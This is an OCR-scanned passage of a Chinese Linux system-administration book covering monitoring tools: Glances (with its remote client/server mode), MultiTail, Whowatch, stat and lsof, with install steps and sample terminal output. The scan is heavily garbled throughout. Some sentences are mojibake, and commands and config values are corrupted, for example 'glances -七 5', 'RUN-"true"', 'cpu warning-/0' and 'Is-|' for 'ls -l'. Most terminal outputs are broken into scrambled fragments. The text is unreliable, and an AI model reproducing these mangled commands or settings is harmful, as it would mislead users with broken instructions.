对 于 管理 员 来 说 ， 系 统 监控 还 包括 通过 检查 运行 的 进程 和 服务 来 监视 系统 的 性 能 。 但 是 ， 由 于 屏幕 上 的 空间 有 限 ， 有 时 难以 
获得 所 有 的 信息 。 在 这 种 情况 下 ， 我 们 希望 有 一 个 工具 可 以 在 有 限 的 空间 内 向 我 们 尽 可 能 多 地 展示 系统 信息 ， 如 CPU、 磁 盘 
|/O、 内 存 、 网 络 等 信息 。 


尽管 有 单独 的 工具 来 监控 这 些 信息 ， 但 通过 Glances， 管 理 员 可 以 在 最 小 的 空间 内 看 到 最 大 量 的 信息 。 它 可 以 根据 终端 窗口 
的 大 小 来 动态 调整 信息 。Glances 可 以 突出 显示 使 用 大 量 系统 资源 的 那些 程序 。 


准备 工作 


当 你 在 Ubuntu 上 安 六 Glances 时 ， 建 议 你 使 用 Ubuntu 13.04 或 更 高 版 本 。 对 于 其 他 版 本 的 Linux 系 统 ， 最 好 使 用 最 新 版 
本 。 在 本 书 的 例子 中 ， 我 们 使 用 的 是 Kali Linux 2.0。 


操作 指南 


为 理解 Glances 的 工作 原理 ， 我 们 将 按照 如 下 步 桑 进行 


1. 第 一 步 是 使 用 以 下 命令 安装 软件 包 : 


apt-get install glances 


2X ESubkmR,. UMdsiB/etc/default/glancesscfft, ZESSRUNSESBSfBtRBIZStrue, W FEFE: 


e 


GNU nano 2.5.1 File: /etc/default/glances 


# Default is to Launch glances with '-s' option. 
ZDAEMON ARGS-'-s" 


# Change to 'true' to have glances running at startup 
RUN-"true" 


这 样 做 会 让 Glances 在 系统 启动 时 自动 运行 。 
3. 要 手动 启动 该 工具 ， 只 需 运 行 glances 命 令 。 你 会 看 到 一 个 输出 窗口 ， 如 下 所 示 : 


kali - IP 192.168.1.102/24 Uptime: 21:57:08 


CPU [ 23.1%] MEM 70.1% SWAP 3.3 LOAD 

MEM [ 70.1%] ser: total: /60M total: 1.26G l1 min: 

SWAP [ 3.3%] s : used: 533M used: WM 5 nmin: 
| free: 22/M free: 1.270 15 min: 


(AS TASKS 148 (336 thr), 1 run, 147 slp, O oth 


CPUS MEM% PID USER NI S Command 

2:6 33:2 1671 roat S /usr/bin/gnome-sh 
4,5 1195 root S /usr/lib/tracker/ 
2 809 Debian-ad S gnome-shell --mod 
9 1235 root S /usr/lib/evolutio 
8 1302 root S /usr/lib/evolutio 
,0 1290 root S /usr/lib/evolutio 
7 

6 

5 

5 

9 


© 


1411 root S /usr/lib/t 
951 root d Fus rr liD 
1156 root S nautilus 
8198 root R /usr/bin/python3 
1159 root s /usr/bin/python3 


b= 
= 


/ (sdal) 


< 


0. 
0. 
0. 
0. 
0. 
0. 
2 
0. 
dE 
0. 


CO CO CO CO CO C2 CO CO CO CO C2 


© 


Warning or critical alerts (one entry) 


人 在 上 述 窗 口中 ， 可 以 看 到 以 不 同 颜色 显示 的 文字 内 容 。 这 些 颜 色 代 码 企 Glances 中 的 定义 如 下 : 
` 绿色 : 正常 (OK) 

. KHE: Ja (CAREFUL) ， 需 要 注意 

` 紫色 : 警告 (WARNING) 

红色 : 问题 严重 (CRITICAL) 


4. 颜 色 代 码 依据 定义 在 配置 文件 中 的 默认 阔 值 进行 标注 。 可 以 通过 编辑 /etc/glances/glances.conf 文 件 来 更 改 这 些 阔 值 。 


[quickLlook j| 

cpu careful -50 
cpu warning-/0 
cpu critical-90 
mem careful-50 


mem warning-/0 
mem critical-S90 
swap careful-50 
swap warning-/0 
swap critical-90 


5 .默认 情况 下 ，Glances 以 1 秒 的 时 间 间 隔 刷新 显示 。 使 用 “-t” 选 项， 后 跟 以 秒 为 单位 的 时 间 值 ， 可 以 在 运行 Glances 时 更 
改 此 默认 值 ， 如 下 命令 所 示 : 


glances -七 5 


6. 我 们 有 时 候 可 能 无 法 物理 访问 系统 ， 但 是 仍然 希望 监控 系统 的 性 能 。Glances 可 以 帮助 我 们 远程 执行 监控 。 为 此 ， 百 移 需 
要 使 用 “-s” 选 项 在 系统 上 局 用 Glances 的 客户 端 /服务 器 模式 ， 并 使 用 “-B” 选 项 将 其 绑 定 至 系统 IP 的 地 址 ， 如 下 所 示 : 


rootükali:-£€ glances -s -B 192.168.1.102 


Glances server is running on 192.168.1.102:61209 


7. 现 在 ，Glances 服 务 器 正在 |P 地 址 为 192.168.1.102 的 系统 上 运行 。 黔 认 情 况 下 ， 它 运行 的 端口 号 为 61209。 如 果 在 启用 客 


户 端 /服务 器 模式 时 提示 输入 密码 ， 请 随意 设 定 你 的 密码 。 
8. 在 要 访问 Glances 的 远程 系统 上 ， 运 行 以 下 命令 : 
glances -c -P 192.168.1.102 


9 一 旦 运行 这 个 命令 ， 束 会 看 到 一 个 窗口 ， 如 下 图 所 示 ， 我 们 将 在 左上 角 看 到 “Connected to Kali-IP 
192.168.1.102/24" ， 这 表示 现在 正在 远程 访问 Glances: 


Connected to kali - IP 192.168.1.102/24 Uptime: 22:26:3 


CPU [ 37.359] 37.3% MEM 72 . 9% SWAP 3.8% LOAD 

MEM [ 72.9%] ser: total: / 50M total: 1.266 ] min: 

SWAP [ 3.85] stem: used: 554M used: EEE 5min: 
idle: 62.7% free: 206M free: D rb Lu main 


Rx/s TX/s TASKS 150 (338 thr); 1 run, 149 slp, O oth 
728b 
o5 Command 
2 /usr/bin/gnome-she 
1195 root S /usr/lib/tracker/t 
809 Debian-ad ) S gnome-shell --mode 
JS 

S 

S 

S 


27Kb CPUS i PID USER NI 
] 3. Id PAM eres 


1235 root /usr/lib/evolutior 
1411 root /usr/lib/gnome-ter 
1302 root /usr/lib/evolution 
1290 root /usr/lib/evolutior 


10. 要 使 该 命令 在 远程 系统 上 能 工作 ， 还 需要 在 该 远程 系统 上 也 安装 Glances。 


原理 解析 
安装 Glances 之 后 ， 我 们 修改 配置 文件 令 其 在 系统 启动 时 自动 运行 。 
使 用 glances 命 令 司 动 它 ， 并 通过 编辑 /etc/glances/glances.conf 文 件 修改 颜色 代码 的 阔 值 。 


使 用 “-t” 选 项 ， 可 以 修改 刷新 时 间 间 隔 ; 使 用 “-s$” 选 项， 可 以 局 用 Glances 的 客户 问 / 服 务 器 模式 ， 然 后 使 用 “-c” 选项 
和 Glances 运 行 所 在 的 系统 的 I|P 地 址 ， 可 以 在 其 他 系统 上 进行 远程 访问 。 


10.4 使 用 MultiTail 监 控 日 志 


对 于 任何 系统 管理 员 而 言 ， 监 控 日 志文 件 都 是 一 个 非 营 繁 琐 的 工作 ， 如 果 必 须 同 时 参考 多 个 日 志文 件 来 解决 问题 ， 那 么 在 日 
志 之 间 进 行 切 换 将 变 得 更 加 困难 。 


对 于 这 种 情况 ， 可 以 使 用 MultiTail 工 具 ， 它 可 以 帮助 我 们 实时 查看 多 个 日 志文 件 。 使 用 MultiTail， 可 以 在 单个 窗口 或 shell 
中 显示 多 个 日 志文 件 ， 它 将 实时 显示 日 志文 件 的 最 后 几 行 。 


准备 工作 


要 使 用 MultiTail 工 具 ， 不 必 在 Linux 系 统 上 进行 特别 设置 ， 只 需要 安装 MultiTail 软 件 包 即 可 。MultiTail 可 以 通过 以 下 命令 进 


apt-get install multitail 


root(ütj-dev:-4 apt-get install multitail 
Reading package lists... Done 

Building dependency tree 

Reading state information... Done 


The following NEW packages will be installed: 

multitail 
© upgraded, 1 newly installed, © to remove and 341 not upgraded. 
Need to get 141 kB of archives. 


安 六 了 MultiTail 工 具 之 后 ， 我 们 就 可 以 根据 要 求 通过 如 下 的 命令 开始 使 用 了 : 
1. 如 果 要 使 用 MultiTail 查 看 两 个 日 志文 件 ， 可 以 运行 以 下 命令 : 
multitail /var/log/syslog /var/log/boot.log 


tj-dev rtkit-daemon[1715]: Demoting known real-time threads. 
18 15: 43:28 tj-dev rtkit-daemon[1715]: Demoted © threads. 
:44: tj-dev rtkit-daemon[1715]: The canary thread is apparently starv 
. Taking action. 
18 15:44:13 tj-dev rtkit-daemon[1715]: Demoting known real-time threads. 
tj-dev rtkit-daemon[1715]: Demoted © threads. 
18 15:47:16 tj-dev rtkit-daemon[1715]: The canary thread is apparently starv 
. Taking action. 
tj-dev rtkit-daemon[1715]: Demoting known real-time threads. 
18 15:47:16 tj-dev rtkit-daemon[1715]: Demoted © threads. 
343KB - 2016/02/18 10:08:39 
Starting ACPI daemon 94G| OK | 


Starting anac(h)ronistic rong sect OK | 


Starting save messagesyff 94G| OK | 

Starting automatic crash report generationi 94G[ OK 

Starting regular background program processing rA OM OK | 
Starting deferred execution schedulergai( 94G| OK | 


Stopping messagesyí 94G| OK 

Starting CPU interrupts balancin reii OK ] 
Starting LightDM Display EER. S OK ] 

Stopping Send an event to indicate plymouth is up 94G[ OK ] 
Starting crash report submission daemongiÉ 94G| OK 


3KB - 2016/02/18 16:08:39 


可 以 看 到 ， 屏 幕 已 经 分 为 两 部 分 ， 每 个 部 分 显示 一 个 日 志文 件 的 内 容 。 


2. 如 果 想 滚动 两 个 打开 的 文件 ， 只 需 按 <b> 键 ,区 会 弹出 一 个 菜 蛙 ， 如 下 图 所 示 。 从 列表 中 ， 可 以 选择 要 详细 监视 的 文件 : 


3. 在 打开 的 新 窗口 中 ， 按 <gg> 或 <G> 移 动 到 浚 动 窗口 的 顶部 或 底部 。 要 退出 滚动 窗口 ， 请 近 <q> 键 。 


4. 如 果 要 两 列 并 排查 看 日 志文 件 ， 可 运行 以 下 命令 : 


multitail -s 2 /var/log/boot.log /var/log/syslog /var/log/auth.log 


下 图 显示 了 在 两 列 中 的 三 个 日 志文 件 : 


* Starting System V runlevel compatibi 
lityMM94G|[ OK | 

* Starting ACPI daemon 94c| OK | 

* Starting anac(h)ronistic crondl 94G| 


OK ] 


* Starting save messages 94G[ 


OK ] 


* Starting automatic crash report gene 
ration 94G[ OK ] 

* Starting regular background program 
processing daemonlÁ 94G[ OK | 

* Starting 
ré 94G| OK 


* Stopping 


OK ] 


* Starting 
emong 94G[ 
* Starting 
4G| OK | 

* Stopping 
lymouth is uplfii94G| OK | 

* Starting crash report submission dae 
monki 94G| OK 


00 


var / Loc 


deferred execution schedule 
I 
save messages »4cí 


CPU interrupts balancing da 
OK ] 
LightDM Display Managerláio 


Send an event to indicate p 


boot.log *Press F1/«CTRL»-« 


Feb 18 15:44:13 tj-dev rtkit-daemon|1715 
]: Demoting known real-time threads. 

: tj-dev rtkit-daemon| 1715 
] : 9 diccEdE, 
Feb 18 15:47:16 tj-dev rtkit-daemon|1715 
]: The canary thread is apparently starv 


ing. Taking action. 


tj-dev rtkit-daemon[1715 
]: Demoting known real-time threads. 
Feb 18 15:47:16 tj-dev rtkit-daemon|[1715 

Demoted 8 threads. 

01] /var/log/syslog *Press F1/«CTRL»-«h2 
ix(su:session): session opened for user 
root by tajinder(uid-1008) 
Feb 18 15:17:01 tj-dev CRON[13758]: pam 
unix(cron:session): session opened for u 
ser root Lt (uid-8) 

tj-dev CRON[13758]: pam 
unix(cron:session): session closed for u 
ser root 
Feb 18 15:52:43 tj-dev gnome-screensaver 
-dialog: gkr-pam: unlocked login keyring 


02 var/log/auth.log *Press Fi1/«CTRL»-4« 


5.MultiTail 允 许 我 们 在 打开 日 志文 件 时 目 定 义 单个 日 志文 件 的 颜色 ， 同 时 还 可 以 将 它们 合并 在 同一 个 窗口 中 。 运 行 如 下 命 


d 


multitail -ci yellow /var/log/auth.log -ci blue -I /var/log/boot. 
log 


18 15:17:01 tj-dev CRON[13758]: pam unix(cron:session): session opened for u 

root by (uid-9) 

18 15:17:02 tj-dev CRON[13758]: pam unix(cron:session): session closed for u| 

root 

18 15:52:43 tj-dev gnome-screensaver-dialog: gkr-pam: unlocked login keyring 

18 16:17:01 tj-dev CRON[14142]: pam unix(cron:session): session opened for u 

root by (uid-0) 

18 16:17:01 tj-dev CRON[14142]: pam unix(cron:session): session closed for u 
"root 

18 16:27:24 tj-dev gnome-screensaver-dialog: gkr-pam: unlocked login keyring 


00] /var/log/boot.log *Press F1/«CTRL»««h» for help* 3KB - 2016/02/18 16:29:14 


原理 解析 


当 我 们 在 同一 个 命令 行 上 给 MultiTail 提 供 两 个 日 志文 件 的 名 称 时 ， 它 将 把 一 个 屏幕 分 为 两 部 分 ， 并 同时 打开 两 个 文件 。 
为 了 使 用 MultiTail 查 看 两 个 以 上 的 日 志文 件 ， 可 以 在 “-s” 选 项 后 加 上 列 数 ， 指 定 要 分 割 屏 幕 的 列 数 。 


MultiTail 还 允许 我 们 在 同一 屏幕 中 查看 多 个 日 志文 件 ， 它 通过 不 同 的 颜色 来 区 分 文件 。 可 以 使 用 “-ci” 选 项 来 指定 颜色 ，。 


在 对 网 络 进行 监视 的 同时 ， 管 理 员 还 希望 对 当前 登录 到 系统 中 的 用 户 进行 监视 ， 并 检查 每 个 用 户 在 机 器 上 的 操作 。 


Whowatch 是 完成 所 有 这 些 任 务 的 完美 工具 。Whowatch 使 用 基于 文本 的 简单 界面 ， 易 于 使 用 ， 可 以 显示 用 户 名 、 用 户 进 
程 以 及 正在 使 用 的 连接 类 型 (如 SSH 和 Telnet) 等 相关 信息 。 


由 于 Whowatch 不 是 Linux 的 预 装 软件 ， 因 此 必须 安装 后 才能 使 用 。 安 装 Whowatch 的 命令 如 下 : 


apt-get install whowatch 


rootütj-dev:-4 apt-get install whowatch 
Reading package lists... Done 

Building dependency tree 

Reading state information... Done 


The following NEW packages will be installed: 
whowatch 


9 upgraded, 1 newly installed, © to remove and 341 not upgraded. 


Need to get 37.4 kB of archives. 


rt 


ef FIRES 


ZR: 


要 最 大 限度 地 利用 Whowatch 工 具 ， 我 们 必须 完全 了 解 该 工具 的 详情 : 
1. 要 开始 使 用 该 工具 ， 只 需 输入 whowatch 命 令 ， 就 会 显示 一 个 窗口 ， 上 面 列 出 所 有 登录 的 用 户 账号 ， 如 下 所 示 : 
ssh, 1 other) 
tajinder  pts/O :1 


(Lightdm) tajinder tty7 
(init) tajinder pts/i :1 


2. 选 择 列 表 中 的 任何 用 户 账号 ， 当 按 <Enter> 键 时 ， 可 以 看 到 该 用 户 正在 运行 的 所 有 程序 的 信息 。 


`- whowatch 
`- gnome-pty-helper 


—  — 


3. 在 同一 个 窗口 上 ， 在 底部 有 更 多 的 选项 ， 通 过 使 用 这 些 选 项 ， 可 以 获得 有 天 用 户 以 及 他 们 所 运行 程序 的 更 多 信息 


， 如 下 所 


[ENT]users [c]md all[t]ree [d]etails [o]wner [s]ysinfo sig[l]ist ^[K]ILL 


4. 在 Whowatch 的 主屏 幕 上 ， 可 以 看 到 底部 的 菜单 。 


[FilHelp [F9]Menu [ENT]proc all[t]ree [i]dle/cma [c]md [d]etails [s]ysinfo 


5. 可 以 看 到 ， 必 须 使 用 <F9> 键 来 访问 菜单 (Menu). 


6. 按 下 <F9> 键 之 后 ， 会 在 屏幕 项 部 看 到 一 个 菜单 。 可 以 使 用 键盘 上 的 万 向 键 在 荣 单 上 移动 选择 。 当 选择 “Process” 选 项 卡 
时 ， 会 看 到 一 个 子 菜单 ， 它 为 运行 的 进程 提供 了 一 个 名 为 发 送 KILL 信 号 的 选项 。 类 似 地 ， 在 该 子 菜单 中 还 可 以 看 到 更 多 选项 : 


File View Process Users 


(init? El .——————————————À 
11926  - gnome-te|METTTCNETAEISNNCN 
14525 SECME) Toggle long C 
11936 SECME] signal list l| 


11991 - SU Send KILL ^K 
11999 ZI send HUP ^U | 
14618 Z send TERM ^T | 


11935 - gnome- 


7. 当 移动 到 “View” 选项 卡 时 ， 将 看 到 以 下 选项 : 


File 


Process Users B 
11926  - Search | 


All processes t 
Users Ent | 
User proc Ent | 


8. 最 后 一 个 选项 卡 是 “Help” ， 其 中 可 以 看 到 “Keys” 选项 。 


About 
Copyright 


9. 单 击 “Keys” 时 ， 将 打开 一 个 新 窗口 并 显示 不 同 任务 键 的 详细 信息 ， 如 下 图 所 示 : 


10. 按 <s> 键 可 获取 更 多 的 系统 相关 信息 。 


11. 如 果 按 <t> 键 ， 可 以 得 到 系统 上 所 有 进程 的 树 状 列表 ， 如 下 图 所 示 : 


' | = = 


local, 8 telnet, 9 ssh, other) load: 0.00, 0.06, 0.190 


108 processes 


1 
13720 
12092 
11926 
11936 
11991 
11999 
146029 
14610 
11935 
11859 
11845 
11/98 
11796 
11794 
11792 
11790 


原理 解析 


- Jsbin/init 
- Jusr/lib/gvfs/gvfsd-metadata 
- fJusr/lib/at-spi2-core/at-spi-bus-launcher 


gnome-terminal 
|- bash 
| =- su 
| - bash 
| |- whowatch -m 
| - whowatch 

gnome-pty-helper 
/usr/bin/python /usr/lib/unity-scope-video-remote/unity-scope-video 
[/usr/lib/unity-lens-music/unity-musicstore-daemon 
[usr/bin/python /usr/lib/unity-lens-video/unity-lens-video 
/usr/lib/unity-lens-music/unity-music-daemon 
[/usr/lib/unity-lens-files/unity-files-daemon 
[/usr/lib/unity-lens-applications/unity-applications-daemon 
/usr/lib/indicator-appmenu/hud-service 


只 要 在 命令 行 中 输入 “whowatch” 即 可 启动 Whowatch 工 具 。 当 它 启 动 时 ,会 显示 一 个 登录 用 户 账号 的 列表 。 只 需 在 任 


意 用 尸 名 上 按 <Enter> 键 ， 即 可 获取 有 关 访 用户 运行 的 所 有 程序 的 信息 。 


要 访问 Whowatch 中 的 更 多 选项 ， 按 <F9> 键 进入 主 菜单 。 然 后 即 可 看 到 各 种 选项 卡 ， 


如 "Process" 


"View" "Users" "Help" AE 


"Process" 选项 卡 提 供 了 管理 进程 的 各 个 选项 ，“View” 选项 卡 提供 了 进程 搜索 和 查看 的 各 个 选项 。 “Help” 选 项 卡 内 


有 一 个 选项 用 于 得 看 可 在 Whowatch 中 使 用 的 快捷 键 。 


我 们 使 用 不 同 的 密 钥 来 访问 系统 信息 并 获取 所 有 进程 的 列表 。 


10.6 ”使 用 系统 工具 stat 


在 Linux 上 工作 时 ,最 常用 的 命令 是 ls， 它 列 出 了 指定 目录 中 的 文件 。 但 是 ， 它 只 显示 文件 相关 的 一 小 部 分 信息 。 
己 使 用 ls 相 比 ， 如 果 使 用 stat 命 令 ， 束 可 以 获得 有 天文 件 / 目 录 的 更 多 信息 。 因 为 stat 命 令 能 够 从 其 书 点 获取 文件 相关 信息 ， 
所 以 它 能 够 提供 更 多 信息 。 


准备 工作 
由 于 stat 是 Linux 的 内 置 命令 ， 所 以 不 需要 进行 任何 其 他 安装 即 可 使 用 它 。 
操作 指南 


本 节 将 介绍 stat 命 令 的 选项 和 用 法 。 使 用 stat， 我 们 可 以 获得 特定 文件 或 文件 系统 的 详细 状态 。 


1. 假 设 有 一 个 名 为 example.txt 的 文件 。 当 使 用 Is-| 命 令 列 表 该 文件 时 ， 将 获取 文件 的 有 关 人 信息， 其 中 包括 文件 的 最 近 修 改 时 
EIR 


但 是 ， 当 使 用 stat 命 令 检 查 同 一 个 文件 的 详细 信息 时 ， 会 显示 该 文件 的 其 他 人 信息， 不同 之 处 如 下 图 所 示 : 


root@tj-dev:~# ls -l example.txt 
-rw-r--r-- 1 root root 20 Feb 18 18:28 example.txt 
rootütj-dev:-4 stat example.txt 
 example.txt' 
: 20 Blocks: 8 IO Block: 4096 regular file 


: 801h/2849d Inode: 134107 Links: 1 

: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 日 / root) 
: 2016-02-18 18:20:13.058859554 +0530 

: 2016-02-18 18:20:23.030860058 +0530 

. 2010-02-18 18:20:23.030800058 +0530 


2. 任 上 述 输出 中 可 以 看 到 ， 修 改 (Modify) 和 变更 (Change) 时 间 是 一 样 的 。 但 访问 (Access) 时 间 有 所 改变 。 它 还 以 八 
进 制 和 rwx 两 种 格式 显示 了 文件 的 许可 权限 ， 以 及 许多 其 他 详细 的 信息 。 


3. 现 在 ， 将 文件 重 命名 为 saample.txt。 之 后 ， 如 果 使 用 stat 命 令 检查 sample.txt 文 件 的 详细 信息 ， 可 以 看 到 变更 (Change) 
时 间 已 更 新 : 


root@t]- 
root@t]- 
root@t]- 

File: 


4. 假 设 有 三 个 文件 sample.txt、sample1.txt 和 sample2.txt。 如 果 想 查看 其 中 每 个 文件 的 详细 信息 ， 可 以 针对 每 个 文件 单独 
使 用 stat 命 令 ， 或 者 可 以 使 用 通配符 和 stat 来 显示 组 中 所 有 三 个 文件 的 详细 信息 ， 如 下 所 示 : 


root@t]- 


File: 
Size: 
Device: 
ACCESS 
Access: 
odify: 
Change: 
Birth: 
File: 
Size: 
Device: 
Access: 
Access: 
Modify: 
Change: 
Birth: 
File: 
Size: 
Device: 
Access: 
Access: 
odify: 
Change: 
Birth: 


dev:~# mv example.txt sample.txt 
dev :~# 

dev:-# stat sample.txt 

-sample.txt"' 

208 Blocks: 8 
881h/2849d Inode: 1341987 
(8644/-rw-r--r--) Uid: ( 9/ 
2016-02-18 18:20:13.058859554 +0530 
2016-02-18 18:20:273.0308600058 +0530 
2016-02-18 138:2/:06.542880445 +0530 


IO Block: 4896 
Links: 1 


root) Gid: ( 


dev:~# stat sample* 

'samplel.txt' 

20 Blocks: 8 
801h/2049d Inode: 172968 
(0644/-rw-r--r--) Uid: ( 8/ 
2016-02-18 18:32:12.174895886 10530 
2016-02-13 18:32:12.1/4895880 10530 
2016-02-18 18:32:12.1/4895886 +0530 
.sample2.txt' 

20 Blocks: 8 
801h/2049d Inode: 172969 
(0644/-rw-r--r--) Uid:( 日 / 
2016-02-18 18:32:15.706896065 40530 
2016-02-13 18:32:15./0068960005 +0530 
2016-02-18 18:32115. 706896065 +0530 


IO Block: 4096 
Links: 1 
root) 


Gid: ( 


IO Block: 46096 
Links: 1 


root) Gid: ( 


"sample.txt' 

20 Blocks: 8 
881h/2849d Inode: 134107 
(0644/-rw-r--r--) Uid: ( 日 / 
2010-02-18 13:327:17.1/4895880 +0530 
2016-02-18 18:20:23.038800058 +0530 
2016-02-18 13:27:86.542880445 +0530 


L. 


IO Block: 4096 
Links: 1 


root) Gid: ( 


5. 还 可 以 使 用 stat 命 令 查 看 目录 的 详细 信息 : 


root@tj-dev:~# stat test 


File: 


Birth: 


test' 
4090 
801h/26049d 
(0755/drwxr -xr -x) 
2016-02-18 18:36:22.586908538 +0530 
2016-02-18 18:360:16.514908?31 +0530 
2016-02-18 18:30:16.514908?31 +0530 


IO Block: 4096 
Links: 2 
root) 


Blocks: 8 
Inode: 172978 


Uid: ( 0/ Gid: ( 


regular file 


07 


root) 


regular file 


J 


root) 


regular file 


90/ 


root) 


regular file 


oj 


root) 


directory 


8/ 


root) 


6. 在 查看 目录 时 ， 可 以 看 到 天 于 链接 (Links) 数量 的 额外 详情 。 


7. 如 果 对 任何 默认 的 Linux 目 录 (如 /etc/) 使 用 stat 命 令 ， 可 以 看 到 链接 的 数量 非常 大 : 


root(tj-dev:/i stat etc 
etc' 
: 12288 Blocks: 24 IO Block: 4096 
: 801h/2049d Inode: 131073 Links: 131 
: (0755/drwxr-xr-x) Uid: ( 0/ root) Gid: ( 日 / 


directory 


root) 
: 2016-82-18 15:09:12.23872730519 +0530 


; 2016-02-18 15:1/:24.602305395 410530 
: 2016-02-18 15:17:24.602305395 40530 


8. 如 果 想 查看 一 个 文件 系统 的 详细 信息 ， 


不 能 使 用 s， 而 要 使 用 stat 命 令 。 它 对 于 文件 系统 和 文件 ， 都 可 以 得 到 相同 类 型 的 
详细 信息 : 


rootütj-dev:/Z stat /dev/sda2? 
'"Jdev/sda2' 
: 60 Blocks: 6 IO Block: 4096 . block special file 
: 5h/ 5d Inode: 7386 Links: 1 Device type: 8,2 
: (8668/brw-rw----) Uid: ( 日 / root) Gid: ( 6/ disk) 
: 2016-03-01 02:35:27.114021189 +0530 
. 2016-03-01 02:35:77.114021189 +0530 
: 2016-03-01 02:35:27.1148?21189 +0530 


9. 在 检查 文件 系统 的 详细 信息 时 ，stat 命 令 结合 “-f” 选项 使 用 ， 将 显示 文件 系统 的 状态 ， 如 下 图 所 示 : 
rootütj-dev:/3 stat -f /dev/sda2 
File: "/dev/sda2" 
ID: 8 Namelen: 255 Type: tmpfs 
Fundamental block size: 4096 
Available: 61040 


Block size: 4096 
Blocks: Total: 61841 Free: 01040 
Inodes: Total: 61041 Free: 60592 


我 们 使 用 stat 命 令 获取 有 关 文 件 的 详细 信息 。 当 一 个 文件 被 重 命名 时 ，stat 可 以 显示 文件 名 改变 的 时 间 。 在 使 用 通 配 竺 
时 ，stat 命 令 将 同时 提供 多 个 文件 的 相关 信息 。 


stat 命 令 对 目录 和 文件 系统 也 适用 。 当 用 于 文件 系统 时 ，stat 可 以 使 用 “-f” 选 项 显示 其 状态 。 


有 了 时， 由 于 某 些 文件 正在 被 使 用 ， 我 们 可 能 面临 无 法 秋 载 磁盘 的 情况 。 而 且 ， 我 们 可 能 无 法 得 知 是 哪个 文件 正在 被 引用。 在 


这 种 情况 下 ， 可 以 检查 系统 上 运行 的 哪些 进程 打开 了 哪些 文件 。 


可 以 使 用 lsof 命 令 来 实现 这 一 目的 ， 访 命令 总 为 “列表 打开 文件 ” (List Open Files) 。 由 于 Linux 将 所 有 内 容 (例如 目 
录 、 设 备 、sockets 等 ) 都 视 为 文件 ， 因 此 可 以 使 用 lsof 轻 松 识别 上 所 有 打开 的 文件 。 


准备 工作 


要 使 用 lsof 命 令 ， 建 议 你 以 root 账 号 登录 ， 否 则 非 root 账 号 需要 使 用 udo， 以 便 使 sof 命 令 的 输出 不 受 限 制 。 
操作 指南 


在 本 证 中 ， 我 们 将 探讨 可 以 和 lsof 命 令 一 并 使 用 的 不 同 选 项 ， 来 了 解 它 的 工作 原理 。 


1. 如 果 只 是 运行 Isof， 它 将 列 出 属于 系统 上 任何 活动 进程 的 折 有 打开 的 文件 。 如 果 输 出 很 长 ， 可 以 使 用 less 命 令 来 滩 动 输 
出 ， 如 下 所 示 : 


lsof | less 


输出 结果 以 列 显示 , 包括 “COMMAND” “PID” "USER" "FD" "TYPE" “DEVICE” 等 ， 以 便 更 清晰 地 理解 文件 。 


“FD” 你 是 文件 搞 述 信息 ， 例 如 当前 工作 目录 (cwd) 、 根 目录 (rtd) 、 程 序 文本 (txt) 等 。 如 果 “FD” 列 是 0u、1u 等 
言 息 ， 那 么 数字 表示 实际 的 文件 描述 符 ， 字 母 表 示 不 同 的 模式 ( 读 访问 、 写 访问 和 读 / 写 访问 ) 。 


DEVICE SIZE/OFF 

8,1 4896 
8,1 4096 / 
8,1 194528 169 /sbin/init 
8.1 47046 263218 /lib/1386-linux-qnu/libnss file 
8,1 134344 263139 /lib/i386-linux-gnu/ld-2.15.s0 
123 ate 5648 /dev/null 
1,3 ata 5648 /dev/null 
1,3 Oto 5648 /dev/null 
0 .8 
0,8 
9,9 
9,9 
1cB 


4 
J 
L 
d 


J 


ate pipe 
ate 59 pipe 
03 anon inode 
j anon inode 
socket 


J 
J 


4 


Oxdb3de c 
REG 8,1 /var / Log/upstart/dbus . Log 
unix Gxdb3dd440 | socket 


1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
T 
1 


2. 要 检查 某 一 特定 用 户 所 有 打开 文件 的 询 表 ， 则 使 用 “-uU” 选项 后 跟 用 户 名 ， 如 下 所 示 : 


lsof -u tajinder 


11583 
11583 
11583 
11583 
11583 
11583 
11583 


11583 
11583 
11583 
11583 
11583 
11583 
11583 


tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 
tajinder 


3. 使 用 lsof， 我 们 可 以 检查 在 特定 端口 


lsof 


-i TCP:22 


Oxdd3ffcco 
Oxdd3fcfco 

0,8 

0,8 
0xdc32f180 
Oxdc32f600 
O0xdc32f3c0 
0xdc32e640 
0xdc32e880 


. 为 此 ， 必 须 使 用 “- 


Xu. ifr Map 


anon inode 
anon inode 
socket 
anon inode 
anon inode 
socket 
socket 
pipe 

pipe 
socket 
socket 
socket 
socket 
socket 


AM. 
Ww a 


root@tj-dev:~# lsof -i TCP:22 

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 

sshd 15455 root 3u IPv4 100126 etg TCP *:ssh (LISTEN) 
sshd 15455 root 4u  IPv6 100128 tO TCP *:ssh (LISTEN) 


4. 在 上 面 的 例子 中 ， 检 查 了 端口 22 上 运行 进程 的 列表 ， 可 以 看 到 SSH 进 程 正在 运行 。 


5. 如 果 想 查看 系统 上 打开 的 文件 的 确切 数量 ， 可 以 运行 以 下 命令 : 


tajinder@tj-dev:~$ lsof | wc -l 


5220 


在 上 面 的 例子 中 ， 有 很 多 打开 的 文件 ， 上 有 具体 说 是 有 5220 个 正在 打开 的 文件 。 


6. 要 检查 哪个 用 尸 正 在 查看 哪个 文件 ， 以 及 哪些 命令 正在 由 用 户 运 行 ， 可 以 使 用 以 下 命令 : 


lsof 


-i -u tajinder 


rootQtj-dev:-4 lsof -i -u tajinder 


PID 
7717 
TIT 
777 
777 
788 
1045 


USER 
avahi 
avahi 
avahi 
avahi 

root 

root 


FD 
13u 
14u 
15u 
16u 
8U 
6u 


TYPE 
IPv4 
IPv6 
IPv4 
IPv6 
IPv4 
IPv4 


8233 
8234 
8235 
8236 
8572 
9086 


Oto 
oto 
oto 
oto 
Oto 
Oto 


DEVICE SIZE/OFF NODE 


UDP 
UDP 
UDP 
UDP 
TCP 
UDP 


NAME 

*:mdns 

*:mdns 

*:52037 

*:38863 

localhost:ipp (LISTEN) 
*:bootpc 


108188 ete UDP localhost:domain 
18189 OtO TCP localhost:domain (LISTE 


IPv4 
IPv4 


nobody 4u 
nobody 5u 


IPv4 101323 OtO UDP *:43050 
IPv4 101327 0tO UDP *:37233 
IPv4 20212 te TCP *:9292 (LISTEN) 
IPv4 28463 OtO TCP *:9191 (LISTEN) 


nobody 10u 
nobody X 11u 
glance 4u 
glance 4u 


glance-re 4901 


